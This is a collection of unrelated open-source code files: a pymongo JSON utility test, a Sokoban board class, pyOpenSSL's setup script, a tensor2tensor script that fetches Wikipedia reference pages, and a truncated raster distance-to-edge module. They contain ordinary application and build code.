json_util.loads('{"custom": {"$type": "ffffffff", "$binary":'
' "aGVsbG8="}}')['custom'].subtype)
def test_code(self):
self.round_trip({"code": Code("function x() { return 1; }")})
code = Code("return z", z=2)
res = json_util.dumps(code)
self.assertEqual(code, json_util.loads(res))
# Check order.
self.assertEqual('{"$code": "return z", "$scope": {"z": 2}}', res)
no_scope = Code('function() {}')
self.assertEqual(
'{"$code": "function() {}"}', json_util.dumps(no_scope))
def test_undefined(self):
jsn = '{"name": {"$undefined": true}}'
self.assertIsNone(json_util.loads(jsn)['name'])
def test_numberlong(self):
jsn = '{"weight": {"$numberLong": "65535"}}'
self.assertEqual(json_util.loads(jsn)['weight'],
Int64(65535))
self.assertEqual(json_util.dumps({"weight": Int64(65535)}),
'{"weight": 65535}')
json_options = json_util.JSONOptions(strict_number_long=True)
self.assertEqual(json_util.dumps({"weight": Int64(65535)},
json_options=json_options),
jsn)
def test_loads_document_class(self):
# document_class dict should always work
self.assertEqual({"foo": "bar"}, json_util.loads(
'{"foo": "bar"}',
json_options=json_util.JSONOptions(document_class=dict)))
if PY26 and not HAS_SIMPLE_JSON:
self.assertRaises(
ConfigurationError, json_util.JSONOptions, document_class=SON)
else:
self.assertEqual(SON([("foo", "bar"), ("b", 1)]), json_util.loads(
'{"foo": "bar", "b": 1}',
json_options=json_util.JSONOptions(document_class=SON)))
class TestJsonUtilRoundtrip(IntegrationTest):
def test_cursor(self):
db = self.db
db.drop_collection("test")
docs = [
{'foo': [1, 2]},
{'bar': {'hello': 'world'}},
{'code': Code("function x() { return 1; }")},
{'bin': Binary(b"\x00\x01\x02\x03\x04")},
{'dbref': {'_ref': DBRef('simple',
ObjectId('509b8db456c02c5ab7e63c34'))}}
]
db.test.insert_many(docs)
reloaded_docs = json_util.loads(json_util.dumps(db.test.find()))
for doc in docs:
self.assertTrue(doc in reloaded_docs)
if __name__ == "__main__":
unittest.main()
|
the-stack_0_25941
|
class Board:
def __init__(self, boardInputFile):
# initialise board variables
self.sizeH, self.sizeV, self.nWallSquares, self.wallCoordinates, self.nBoxes, \
self.boxCoordinates, self.nstorLocations, self.storCoordinates, self.playerLoc = \
None, None, None, None, None, None, None, None, None
self.boardInputFile, self.boardGrid = boardInputFile, None
self.actions = {"u": (-1,0), "U": (-1,0), "l": (0,-1), "L": (0,-1), "d": (1,0), "D": (1,0), "r": (0,1), "R": (0,1)}
def __str__(self):
"""display class variables"""
return "sizeH: {self.sizeH}, sizeV: {self.sizeV}, nWallSquares: {self.nWallSquares}, wallCoordinates: {self.wallCoordinates}, nBoxes: {self.nBoxes}, boxCooridates: {self.boxCoordinates}, nstorLocations: {self.nstorLocations}, storCoordinates: {self.storCoordinates}, playerLoc: {self.playerLoc}'.format(self = self)"
def get_sizeH(self):
return self.sizeH
def get_sizeV(self):
return self.sizeV
def get_nWall_squares(self):
return self.nWallSquares
def get_wall_coordatinates(self):
return self.wallCoordinates
def get_nBoxes(self):
return self.nBoxes
def get_box_coordinates(self):
return self.boxCoordinates
def get_nStor_locations(self):
return self.nstorLocations
def get_stor_coordinates(self):
return self.storCoordinates
def get_player_loc(self):
return self.playerLoc
def get_board_grid(self):
return self.boardGrid
def string_to_int_list(self, stringList):
return list(map(int, stringList))
def group_coordinates(self, n, coordList):
"""newCoordList is a list of tuples. I think it's a good idea to use tuples for positions in the game board.
The initial position of sokoban is also a tuple (x,y)"""
newCoordList = []
for i in range(0, n*2, 2):
# -1 to match python array indices
newCoordList.append((coordList[i] - 1, coordList[i+1] - 1))
return newCoordList
def parse(self): # parse input file - sokobanXY.txt
"""input is expected to have 5 lines
line 1 is the sizeH, sizeV
line 2 is nWallSquares followed by a list wallCoordinates
line 3 is a list of boxCordinates
line 4 is a list of storCoordinates (storage location coordinates)
line 5 is the initial position of SOKOBAN"""
lineNumber = 1 # to iterate through the lines
with open(self.boardInputFile) as f:
for line in f:
l_line = line.split(' ')
if lineNumber == 1:
self.sizeH, self.sizeV = int(l_line[0]),int(l_line[1])
# print(self.sizeH,self.sizeV)
elif lineNumber == 2:
self.nWallSquares,self.wallCoordinates = int(l_line[0]),self.string_to_int_list(l_line[1: ])
self.wallCoordinates = self.group_coordinates(self.nWallSquares,self.wallCoordinates)
# print(self.nWallSquares,self.wallCoordinates)
elif lineNumber == 3:
self.nBoxes,self.boxCoordinates = int(l_line[0]),self.string_to_int_list(l_line[1: ])
self.boxCoordinates = self.group_coordinates(self.nBoxes,self.boxCoordinates)
elif lineNumber == 4:
self.nstorLocations,self.storCoordinates = int(l_line[0]),self.string_to_int_list(l_line[1: ])
self.storCoordinates = self.group_coordinates(self.nstorLocations,self.storCoordinates)
elif lineNumber == 5:
# -1 to match python array indices
self.playerLoc = (int(l_line[0])-1,int(l_line[1])-1) # (x,y) tuple
lineNumber += 1
"""While game playing, sizeH, sizeV, nWallSquares, wallCoordinates, nBoxes, nstorLocations, storCoordinates
remains fixed. The two variables which change according to the input are boxCordinates and playerLoc."""
def box_on_goal(self):
# check if any of the boxes are on any of the storage locations
flag = [i for i in self.boxCoordinates if i in self.storCoordinates]
if len(flag) > 0:
return (True, flag)
return False
def sokoban_on_goal(self):
# check if Sokoban is on goal
if self.playerLoc in self.storCoordinates:
return True
return False
def is_goal_state(self):
return sorted(self.storCoordinates) == sorted(self.boxCoordinates)
def make_board_grid(self):
if self.sizeH is None or self.sizeV is None:
return False
# self.sizeV is the number of lists in self.boardGrid and self.sizeH is the size of each list
self.boardGrid = [[' ' for i in range(self.sizeH)] for j in range(self.sizeV)]
for i in range(self.nWallSquares):
self.boardGrid[self.wallCoordinates[i][0]][self.wallCoordinates[i][1]] = '#'
for i in range(self.nstorLocations):
self.boardGrid[self.storCoordinates[i][0]][self.storCoordinates[i][1]] = '.'
for i in range(self.nBoxes):
self.boardGrid[self.boxCoordinates[i][0]][self.boxCoordinates[i][1]] = '$'
# check if any of the boxes are on any of the storage locations
result = self.box_on_goal()
if result:
stored_coordinates = result[1]
# print(stored_coordinates, '@'*10)
for i in range(len(stored_coordinates)):
self.boardGrid[stored_coordinates[i][0]][stored_coordinates[i][1]] = '*'
# check if Sokoban is on goal
if self.sokoban_on_goal():
# print('sokoban on gloal')
self.boardGrid[self.playerLoc[0]][self.playerLoc[1]] = '+'
else:
# print('sokoban not on goal')
self.boardGrid[self.playerLoc[0]][self.playerLoc[1]] = '@'
return self.boardGrid
def display_board(self):
"""
"#" - Wall
" " - Free Space
"$" - Box
"." - Goal Place
"*" - Box is placed on a goal
"@" - Sokoban
"+" - Sokoban on a goal
"""
for i in range(self.sizeV):
for j in range(self.sizeH):
print(self.boardGrid[i][j], end = '')
print('')
def is_legal_move(self, action):
x, y = None, None
if action.isupper():
# print('isupper')
x, y = self.playerLoc[0] + 2*self.actions[action][0], self.playerLoc[1] + 2*self.actions[action][1] # look two steps ahead
else:
# print('islower')
# print('test')
x, y = self.playerLoc[0] + self.actions[action][0], self.playerLoc[1] + self.actions[action][1] # look one step ahead
"""If there is not box next to the Sokobon and the input is still uppercase, then we can expect funny behavior from this code"""
coord = (x,y)
# print(coord, 'FLAG**')
# print(self.wallCoordinates)
if (coord in self.boxCoordinates) or (coord in self.wallCoordinates):
# print('1')
coord = False
if x<0 or x>self.sizeV - 1:
# print('2')
coord = False
if y<0 or y>self.sizeH - 1:
# print('3')
coord = False
# print(coord, 'FLAG##')
return coord
# if move is legal then update board
def update_board(self, action):
# print(self.is_legal_move(action), '?IS LEGAL?')
if self.is_legal_move(action):
# print(self.playerLoc, 'OLD PLAYER LOCATION')
(x,y) = (self.playerLoc[0]+self.actions[action][0], self.playerLoc[1]+self.actions[action][1])
# print(self.playerLoc)
# print(x,y)
if action.isupper() and (x,y) in self.boxCoordinates:
# print(self.boxCoordinates)
self.boxCoordinates.remove((x,y))
self.boxCoordinates.append((self.playerLoc[0]+2*self.actions[action][0], self.playerLoc[1]+2*self.actions[action][1]))
# print(self.boxCoordinates)
self.playerLoc = (x,y)
return True
return False
# def pseudo_update_board(self, action):
# assert self.is_legal_move(action)
# (x, y) = (self.playerLoc[0]+self.actions[action][0], self.playerLoc[1]+self.actions[action][1])
# both box and player coordinates change
# if action.isupper() and (x,y) in self.boxCoordinates:
# newBoxCoordinates = deepcopy(self.boxCoordinates)
# newBoxCoordinates.remove((x, y))
# newBoxCoordinates.append((self.playerLoc[0]+2*self.actions[action][0], self.playerLoc[1]+2*self.actions[action][1]))
# else:
# newBoxCoordinates = deepcopy(self.boxCoordinates)
# newPlayerCoordinates = deepcopy((x, y))
# return newPlayerCoordinates, newBoxCoordinates
def possible_moves(self):
legal_actions = []
for action in self.actions:
if self.is_legal_move(action):
(x,y) = (self.playerLoc[0]+self.actions[action][0], self.playerLoc[1]+self.actions[action][1])
if (x,y) in self.boxCoordinates and action.islower():
continue
if (x,y) not in self.boxCoordinates and action.isupper():
continue
legal_actions.append(action)
return legal_actions
|
the-stack_0_25944
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) AB Strakt 2001, All rights reserved
# Copyright (C) Jean-Paul Calderone 2008-2010, All rights reserved
#
"""
Installation script for the OpenSSL module
"""
import sys, os
from distutils.core import Extension, setup
from distutils.errors import DistutilsFileError
from distutils.command.build_ext import build_ext
# XXX Deduplicate this
__version__ = '0.11'
crypto_src = ['OpenSSL/crypto/crypto.c', 'OpenSSL/crypto/x509.c',
'OpenSSL/crypto/x509name.c', 'OpenSSL/crypto/pkey.c',
'OpenSSL/crypto/x509store.c', 'OpenSSL/crypto/x509req.c',
'OpenSSL/crypto/x509ext.c', 'OpenSSL/crypto/pkcs7.c',
'OpenSSL/crypto/pkcs12.c', 'OpenSSL/crypto/netscape_spki.c',
'OpenSSL/crypto/revoked.c', 'OpenSSL/crypto/crl.c',
'OpenSSL/util.c']
crypto_dep = ['OpenSSL/crypto/crypto.h', 'OpenSSL/crypto/x509.h',
'OpenSSL/crypto/x509name.h', 'OpenSSL/crypto/pkey.h',
'OpenSSL/crypto/x509store.h', 'OpenSSL/crypto/x509req.h',
'OpenSSL/crypto/x509ext.h', 'OpenSSL/crypto/pkcs7.h',
'OpenSSL/crypto/pkcs12.h', 'OpenSSL/crypto/netscape_spki.h',
'OpenSSL/crypto/revoked.h', 'OpenSSL/crypto/crl.h',
'OpenSSL/util.h']
rand_src = ['OpenSSL/rand/rand.c', 'OpenSSL/util.c']
rand_dep = ['OpenSSL/util.h']
ssl_src = ['OpenSSL/ssl/connection.c', 'OpenSSL/ssl/context.c', 'OpenSSL/ssl/ssl.c',
'OpenSSL/util.c']
ssl_dep = ['OpenSSL/ssl/connection.h', 'OpenSSL/ssl/context.h', 'OpenSSL/ssl/ssl.h',
'OpenSSL/util.h']
IncludeDirs = None
LibraryDirs = None
# Add more platforms here when needed
if os.name == 'nt' or sys.platform == 'win32':
Libraries = ['Ws2_32']
class BuildExtension(build_ext):
"""
A custom command that semiautomatically finds dependencies required by
PyOpenSSL.
"""
user_options = (build_ext.user_options +
[("with-openssl=", None,
"directory where OpenSSL is installed")])
with_openssl = None
openssl_dlls = ()
openssl_mingw = False
def finalize_options(self):
"""
Update build options with details about OpenSSL.
"""
build_ext.finalize_options(self)
if self.with_openssl is None:
self.find_openssl()
self.find_openssl_dlls()
self.add_openssl_compile_info()
def find_openssl(self):
"""
Find OpenSSL's install directory.
"""
potentials = []
dirs = os.environ.get("PATH").split(os.pathsep)
for d in dirs:
if os.path.exists(os.path.join(d, "openssl.exe")):
ssldir, bin = os.path.split(d)
if not bin:
ssldir, bin = os.path.split(ssldir)
potentials.append(ssldir)
childdirs = os.listdir(ssldir)
if "lib" in childdirs and "include" in childdirs:
self.with_openssl = ssldir
return
if potentials:
raise DistutilsFileError(
"Only found improper OpenSSL directories: %r" % (
potentials,))
else:
raise DistutilsFileError("Could not find 'openssl.exe'")
def find_openssl_dlls(self):
"""
Find OpenSSL's shared libraries.
"""
self.openssl_dlls = []
self.find_openssl_dll("libssl32.dll", False)
if self.openssl_dlls:
self.openssl_mingw = True
else:
self.find_openssl_dll("ssleay32.dll", True)
self.find_openssl_dll("libeay32.dll", True)
# add zlib to the mix if it looks like OpenSSL
# was linked with a private copy of it
self.find_openssl_dll("zlib1.dll", False)
def find_openssl_dll(self, name, required):
"""
Find OpenSSL's shared library and its path after installation.
"""
dllpath = os.path.join(self.with_openssl, "bin", name)
if not os.path.exists(dllpath):
if required:
raise DistutilsFileError("could not find '%s'" % name)
else:
return
newpath = os.path.join(self.build_lib, "OpenSSL", name)
self.openssl_dlls.append((dllpath, newpath))
def add_openssl_compile_info(self):
"""
Set up various compile and link parameters.
"""
if self.compiler == "mingw32":
if self.openssl_mingw:
# Library path and library names are sane when OpenSSL is
# built with MinGW .
libdir = "lib"
libs = ["eay32", "ssl32"]
else:
libdir = ""
libs = []
# Unlike when using the binary installer, which creates
# an atypical shared library name 'ssleay32', so we have
# to use this workaround.
if self.link_objects is None:
self.link_objects = []
for dllpath, _ in self.openssl_dlls:
dllname = os.path.basename(dllpath)
libname = os.path.splitext(dllname)[0] + ".a"
libpath = os.path.join(self.with_openssl,
"lib", "MinGW", libname)
self.link_objects.append(libpath)
else:
libdir = "lib"
libs = ["libeay32", "ssleay32"]
self.include_dirs.append(os.path.join(self.with_openssl, "include"))
self.library_dirs.append(os.path.join(self.with_openssl, libdir))
self.libraries.extend(libs)
def run(self):
"""
Build extension modules and copy shared libraries.
"""
build_ext.run(self)
for dllpath, newpath in self.openssl_dlls:
self.copy_file(dllpath, newpath)
def get_outputs(self):
"""
Return a list of file paths built by this comand.
"""
output = [pathpair[1] for pathpair in self.openssl_dlls]
output.extend(build_ext.get_outputs(self))
return output
else:
Libraries = ['ssl', 'crypto']
BuildExtension = build_ext
def mkExtension(name):
modname = 'OpenSSL.' + name
src = globals()[name.lower() + '_src']
dep = globals()[name.lower() + '_dep']
return Extension(modname, src, libraries=Libraries, depends=dep,
include_dirs=IncludeDirs, library_dirs=LibraryDirs)
setup(name='pyOpenSSL', version=__version__,
packages = ['OpenSSL'],
package_dir = {'OpenSSL': 'OpenSSL'},
ext_modules = [mkExtension('crypto'), mkExtension('rand'),
mkExtension('SSL')],
py_modules = ['OpenSSL.__init__', 'OpenSSL.tsafe',
'OpenSSL.version', 'OpenSSL.test.__init__',
'OpenSSL.test.util',
'OpenSSL.test.test_crypto',
'OpenSSL.test.test_rand',
'OpenSSL.test.test_ssl'],
zip_safe = False,
cmdclass = {"build_ext": BuildExtension},
description = 'Python wrapper module around the OpenSSL library',
author = 'Martin Sjögren, AB Strakt',
author_email = '[email protected]',
maintainer = 'Jean-Paul Calderone',
maintainer_email = '[email protected]',
url = 'http://pyopenssl.sourceforge.net/',
license = 'LGPL',
long_description = """\
High-level wrapper around a subset of the OpenSSL library, includes
* SSL.Connection objects, wrapping the methods of Python's portable
sockets
* Callbacks written in Python
* Extensive error-handling mechanism, mirroring OpenSSL's error codes
... and much more ;)"""
)
|
the-stack_0_25946
|
# coding=utf-8
# Copyright 2020 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fetch reference URLs for a single group_id within a single shard_id.
See get_references_web.py to fetch URLs for all groups in within a single
shard_id.
Requires Python 3.5
pip3 install aiohttp cchardet aiodns bs4 tensorflow
"""
import datetime
import json
import math
import multiprocessing
import os
import random
import asyncio
import aiohttp
import tensorflow as tf
from tensor2tensor.data_generators.wikisum import html
from tensor2tensor.data_generators.wikisum import utils
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("urls_dir", "gs://tensor2tensor-data/wikisum/wiki_urls/",
"Directory with wiki_urls.json files.")
flags.DEFINE_string("out_dir", None, "Directory to write reference files.")
flags.DEFINE_integer("max_parallel_requests", 50,
"Number of web requests to make in parallel.")
# Identify which URLs to fetch
flags.DEFINE_integer("shard_id", 0, "ID of URL shard to process.")
flags.DEFINE_integer("group_id", 0, "ID of group within the shard to process.")
flags.DEFINE_bool("log_samples", False,
"Whether to write out samples of the text extraction.")
flags.DEFINE_integer("log_every", 1000,
"How often to log and write out samples.")
flags.DEFINE_integer("debug_num_urls", 0,
"If >0, limits number of URLs fetched per input shard. "
"For debugging purposes only.")
WIKI_URLS_FILE = "wiki_urls.json-%05d-of-01000"
REF_SHARD_FILE = "references.tfrecords.gz-%05d-of-01000"
# Note that this program leaks memory, likely due to a bug in Python's SSL
# implementation that leaks sockets. This constant is used here and in
# get_references_web.py to limit the number of requests made by a single
# Python process. The more requests made, the more memory required due to the
# leak.
# TODO(rsepassi): Document memory impact of changing this.
URLS_PER_CLIENT = 5000
def concat_tfrecord_files(fnames, out_fname, rm_after=True):
with tf.gfile.Open(out_fname, "wb") as out_f:
for fname in fnames:
with tf.gfile.Open(fname, "rb") as in_f:
while True:
read = in_f.read(1000)
if not read:
break
out_f.write(read)
if rm_after:
tf.gfile.Remove(fname)
def shard(items, num_shards):
"""Split items into num_shards groups."""
sharded = []
num_per_shard = len(items) // num_shards
start = 0
for _ in range(num_shards):
sharded.append(items[start:start + num_per_shard])
start += num_per_shard
remainder = len(items) % num_shards
start = len(items) - remainder
for i in range(remainder):
sharded[i].append(items[start + i])
assert sum([len(fs) for fs in sharded]) == len(items)
return sharded
def mp_get_text(url, html):
return url, html.get_text_from_html(html)
def encode(s):
return bytes(s, "utf-8")
def make_example_from_ref(url, ref):
try:
url = encode(url)
ref = encode(ref)
except UnicodeEncodeError:
return None
features = {
"url":
tf.train.Feature(bytes_list=tf.train.BytesList(value=[url])),
"content":
tf.train.Feature(
bytes_list=tf.train.BytesList(value=[ref])),
}
return tf.train.Example(features=tf.train.Features(feature=features))
def tfrecord_fname(out_dir, shard_id, idx=None):
fname = os.path.join(out_dir, REF_SHARD_FILE % shard_id)
if idx is not None:
fname += ".%d" % idx
return fname
def make_tfrecord_writer(fname):
opts = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.GZIP)
return tf.python_io.TFRecordWriter(fname, opts)
def write_ref_content(url, ref, f):
if not ref:
return False
ex = make_example_from_ref(url, ref)
if ex is None:
return False
f.write(ex.SerializeToString())
return True
async def fetch_url(url, session, side_data):
text = None
try:
async with session.get(url, timeout=10, verify_ssl=False) as response:
if response.status == 200:
text = await response.text()
else:
tf.logging.error("Status %d, url: %s", response.status, url)
except:
# Request can fail for many reasons.
pass
return text, side_data
async def throttled_fetch_url(url, sem, session, side_data):
async with sem:
return await fetch_url(url, session, side_data)
async def fetch_urls(urls,
out_fname,
logging_fnames=None):
tasks = []
connector = aiohttp.TCPConnector(limit_per_host=1)
async with aiohttp.ClientSession(
connector=connector, cookie_jar=aiohttp.DummyCookieJar()) as session:
# Async fetch the urls
sem = asyncio.Semaphore(FLAGS.max_parallel_requests)
for url in urls:
side_data = {"url": url}
task = asyncio.ensure_future(
throttled_fetch_url(url, sem, session, side_data))
tasks.append(task)
tf.logging.info("Async requested %d urls", len(urls))
# Setup output files
file_handles = []
out_f = make_tfrecord_writer(out_fname)
file_handles.append(out_f)
logging_fnames = logging_fnames or {}
samples_f = None
if "samples" in logging_fnames:
samples_f = tf.gfile.Open(logging_fnames["samples"], "w")
file_handles.append(samples_f)
refs_written = [0] # Made a list so can be mutated
def text_extraction_callback(callback_arg):
url, text = callback_arg
written = write_ref_content(url, text, out_f)
if not written:
return
if not refs_written[0] % FLAGS.log_every:
timestamp = datetime.datetime.now().strftime("%H:%M")
tf.logging.info("%s: Wrote ref %d in group", timestamp, refs_written[0])
if samples_f is not None:
samples_f.write(url)
samples_f.write("\n")
samples_f.write(text)
samples_f.write("\n\n---\n\n")
refs_written[0] += 1
try:
# Process each URL as it comes in.
# Using a multiprocessing Pool because the text extraction is expensive
# and so we distribute across cores.
pool = multiprocessing.Pool()
results = []
for task in asyncio.as_completed(tasks):
html, side_data = await task
url = side_data["url"]
if not html:
continue
res = pool.apply_async(mp_get_text, (url, html), {},
text_extraction_callback)
results.append(res)
for res in results:
try:
res.get(timeout=10)
except multiprocessing.TimeoutError:
pass
finally:
for f in file_handles:
f.close()
return refs_written[0]
def get_urls_per_shard(urls_files):
total_urls = 0
per_shard = {}
for urls_file in urls_files:
ref_urls = set()
shard_id = int(os.path.basename(urls_file)[15:20])
with tf.gfile.Open(urls_file) as f:
wiki_urls = json.loads(f.read())
for _, wiki_info in wiki_urls.items():
ref_urls |= set(wiki_info["refs"])
per_shard[shard_id] = list(ref_urls)
total_urls += len(ref_urls)
return per_shard, total_urls
def get_urls_for_shard(urls_dir, shard_id):
urls_file = os.path.join(urls_dir, WIKI_URLS_FILE % shard_id)
urls_per_shard, _ = get_urls_per_shard([urls_file])
assert len(urls_per_shard) == 1
return urls_per_shard[shard_id]
def get_urls_for_shard_group(urls_dir, shard_id, group_id):
shard_urls = get_urls_for_shard(urls_dir, shard_id)
# Deterministic sort and shuffle to prepare for sharding
shard_urls.sort()
random.seed(123)
random.shuffle(shard_urls)
groups = shard(shard_urls, int(math.ceil(len(shard_urls) / URLS_PER_CLIENT)))
group_urls = groups[group_id]
if FLAGS.debug_num_urls:
group_urls = group_urls[:FLAGS.debug_num_urls]
return group_urls
def main(_):
urls = get_urls_for_shard_group(
FLAGS.urls_dir, FLAGS.shard_id, FLAGS.group_id)
tf.logging.info("Fetching %d URLs for shard %d, group %d",
len(urls), FLAGS.shard_id, FLAGS.group_id)
tf.gfile.MakeDirs(FLAGS.out_dir)
out_fname = tfrecord_fname(FLAGS.out_dir, FLAGS.shard_id)
with utils.timing("group_fetch"):
logging_fnames = {}
if FLAGS.log_samples:
logging_fnames["samples"] = os.path.join(
FLAGS.out_dir, "samples.%d.txt" % FLAGS.shard_id)
loop = asyncio.get_event_loop()
num_written = loop.run_until_complete(asyncio.ensure_future(
fetch_urls(urls,
out_fname,
logging_fnames)))
tf.logging.info("Total URLs: %d", len(urls))
tf.logging.info("Num written: %d", num_written)
tf.logging.info("Coverage: %.1f", (num_written / len(urls)) * 100)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
|
the-stack_0_25947
|
# Author: David Kerr <[email protected]>
# License: MIT
"""
Module with class to calculate the distance to edge (internal and external) from every source pixel to its closest destination polygon (closest point on polygon).
"""
from pathlib import Path
import geopandas as gpd
import numpy as np
import pandas as pd
import rasterio
from rasterio.merge import merge
import rioxarray
from rioxarray.merge import merge_arrays, merge_datasets
import xarray
from haversine_distance.errors import BlockSizesError
from haversine_distance.utils import check_paths, check_tile_sizes, get_windows, get_points_from_pixels, get_buffer_gdf, clip_using_gdf, dist_to_edge, save_points_to_raster, make_dataset_from_points, get_rtrees, get_rtrees_from_geopackage, distance_to_polygon_edge, make_dataset_from_nodata_points, distance_to_nearest_neighbour, get_corner_buffers, get_corner_points, intersect_points_with_dataset, merge_corner_buffers_and_rebuffer
class DistanceToFeatureEdge:
def __init__(self, in_raster, out_raster, buffer_method='corners', mask=None):
"""
Class intantiation
Parameters:
------------
in_raster : Path/str
Path to binary input raster (0 values -> External land pixels to caculate distances; 1 values -> Pixels defined as feature to calculate distances to; NA/NoData values -> 'sea' pixels that will not be calculated (if these disances are needed, then 'sea' pixels should be left as 0))
Raster should be in EPSG:4326 projection
out_raster : Path/str
Path to output raster representing internal and external distances to the edge of the features defined in in_raster
buffer_method : str ('corners'/'centroid')
Method in which to find closest 0 and 1 pixels in global destination raster. 'corners' (Default) can take longer as 4 buffers are required for each tile. 'centroid' is faster but can result in edge effects due to 'closest' pixels being found as a false positive. See README.
mask : Path/str/None
Path to mask raster if distances relative to global (in_raster) raster features are only desired within smaller extent. Raster should have 2 unique values only, one being nodata
Returns:
--------
None
"""
self.in_raster = check_paths(in_raster)
if not check_tile_sizes(in_raster):
raise BlockSizesError(f"Tile sizes should be square for this program. Please remake {self.in_raster.name} as a tiled raster with square blocks (i.e. >>gdal_translate -a_srs EPSG:4326 -co COMPRESS=LZW -co TILED=YES -co BLOCKXSIZE=512 BLOCKYSIZE=512 {str(self.in_raster)} <OUTPUT_NAME.tif> ")
self.out_raster = check_paths(out_raster)
self.buffer_method = buffer_method
if not self.buffer_method in ['corners', 'centroid']:
raise Exception("Buffer method shoud be 'corners' or 'centroid'.")
self.dataset = rioxarray.open_rasterio(self.in_raster) # open global raster
def points_generator(self):
"""
Generator yields each block window of self.in_raster as points in geodataframe
Parameters:
-----------
None
Yields:
--------
gdf_pt : gpd.GeoDataFrame OR np.array
GeoDataframe of point OR np.array of nodata values if no valid values in array
"""
nodata = self.dataset._FillValue
for data, window in get_windows(self.in_raster):
if not np.all(data == nodata):
gdf_pt = get_points_from_pixels(self.dataset, window)
else:
gdf_pt = data #This is not a geodataframe
yield gdf_pt, window
def get_rtrees_from_buffer(self, tile):
"""
Iteratively buffers tile's bounds and clips raster dataset using buffer until both 0 AND 1 values are found in the clip. Polygons are then built from the 2 values and rtrees are built and returned
Parameters:
-----------
tile : gpd.GeoDataFrame
Point geodataframe representing raster tile
Returns:
---------
rtree_0 : shapely.strtree.STRtree
STR tree of geometries for polygons/features valued at 0
rtree_1 : shapely.strtree.STRtree
STR tree of geometries for polygons/features valued at 1
"""
pixels_0_and_1_present = False
buffer_multiple = 2
while not pixels_0_and_1_present:
print(f'{buffer_multiple} buffer')
try:
buffer = get_buffer_gdf(tile, diagonal_multiples=buffer_multiple)
clip = clip_using_gdf(buffer, self.dataset)
if (1 in clip) and (0 in clip):
pixels_0_and_1_present = True
rtree_0, rtree_1 = get_rtrees(clip)
else:
buffer_multiple = buffer_multiple * 2
except MemoryError as e:
raise e('Memory exceeded when trying to find closest feature to point')
return rtree_0, rtree_1
def get_destination_points_centroid_buffer(self, tile):
"""
Returns geodataframe of points in buffer from tile. Will only return points that are valued 1 and 0. If not present, buffer will keep increasing
Parameters:
-----------
tile : gpd.GeodataFrame
Point geodataframe of raster tile (Source points)
Returns:
--------
gdf_dst : gpd.GeoDataFrame
Point geodataframe of destination points
"""
pixels_0_and_1_present = False
buffer_multiple = 2
############################
while not pixels_0_and_1_present:
try:
buffer = get_buffer_gdf(tile, diagonal_multiples=buffer_multiple)
clip = clip_using_gdf(buffer, self.dataset)
if (1 in clip) and (0 in clip):
pixels_0_and_1_present = True
gdf_dst = get_points_from_pixels(clip, window=None, remove_nodata_before_converting=True)
else:
buffer_multiple = buffer_multiple * 5
except MemoryError as e:
raise e('Memory exceeded when trying to find closest feature to point')
return gdf_dst
def get_destination_points_corner_buffer(self, tile):
"""
Returns geodataframe of points in buffer from tile. Will only return points that are valued 1 and 0. Buffer is calculated be initially buffering from the 4 corners or the tile until 0/1 pixels are found. Corner buffers are then merged and a new buffer is made based on distance from tile centroid to corner buffers' bounding box corner
Parameters:
-----------
tile : gpd.GeodataFrame
Point geodataframe of raster tile (Source points)
Returns:
--------
gdf_dst : gpd.GeoDataFrame
Point geodataframe of destination points
"""
try:
gdf_corners = get_corner_buffers(tile, self.dataset)
buffer = merge_corner_buffers_and_rebuffer(gdf_corners)
dataset_clip = clip_using_gdf(buffer, self.dataset)
gdf_dst = get_points_from_pixels(dataset_clip, window=None, remove_nodata_before_converting=True)
except MemoryError as e:
raise e('Memory exceeded when trying to find closest feature to point')
return gdf_dst
def calculate_distance(self, gdf_src, gdf_dst):
"""
Returns gdf with 'dist_to' column appended with distance to closest feature
Parameters:
-----------
self : Instantiated class
gdf : gpd.GeoDataFrame
Point geodataframe representing raster's pixels
"""
gdf_src_nodata = gdf_src[gdf_src['data'] == self.dataset._FillValue]
gdf_src_0 = gdf_src.loc[gdf_src['data'] == 0]
gdf_src_1 = gdf_src.loc[gdf_src['data'] == 1]
gdf_dst_0 = gdf_dst[gdf_dst['data'] == 0]
gdf_dst_1 = gdf_dst[gdf_dst['data'] == 1]
gdf_distance_0 = None
gdf_distance_1 = None
if not gdf_src_0.empty:
gdf_distance_0 = distance_to_nearest_neighbour(gdf_src_0, gdf_dst_1)
if not gdf_src_1.empty:
gdf_distance_1 = distance_to_nearest_neighbour(gdf_src_1, gdf_dst_0)
if not gdf_distance_1 is None:
if not gdf_distance_1.empty:
gdf_distance_1.dist_to = gdf_distance_1.dist_to * -1
if (gdf_distance_0 is not None) and (gdf_distance_1 is None):
if not gdf_distance_0.empty:
gdf_distance = gpd.GeoDataFrame(pd.concat([gdf_distance_0, gdf_src_nodata]))
elif (gdf_distance_1 is not None) and (gdf_distance_0 is None):
if not gdf_distance_1.empty:
gpd.GeoDataFrame(pd.concat([gdf_distance_1, gdf_src_nodata]))
else:
gdf_distance = gpd.GeoDataFrame(pd.concat([gdf_distance_0, gdf_distance_1, gdf_src_nodata]))
gdf_distance.loc[gdf_distance.data == 255, 'dist_to'] = -99999999
return gdf_distance
def calculate(self):
"""
Wrapper function to calulate distance to edge and rasterise output
Parameters:
-----------
self : DistanceToFeatureEdge
Instantiated object
Returns:
---------
None
"""
src = rasterio.open(self.in_raster)
resolution = tuple(src.get_transform()[5:] + src.get_transform()[1:2])
profile = src.profile.copy()
original_nodata = profile['nodata']
src.close()
profile.update({
"driver": "GTiff",
"count": 1,
"dtype": 'int32',
"nodata": -99999999
})
index = 0
with rasterio.open(self.out_raster, 'w', **profile) as dst:
for tile, window in self.points_generator():
if isinstance(tile, np.ndarray):
data = tile.astype(np.int32)
data[data == original_nodata] = dst.nodata
data = data[0]
else:
if self.buffer_method == 'centroid':
gdf_destination = self.get_destination_points_centroid_buffer(tile)
elif self.buffer_method == 'corners':
gdf_destination = self.get_destination_points_corner_buffer(tile)
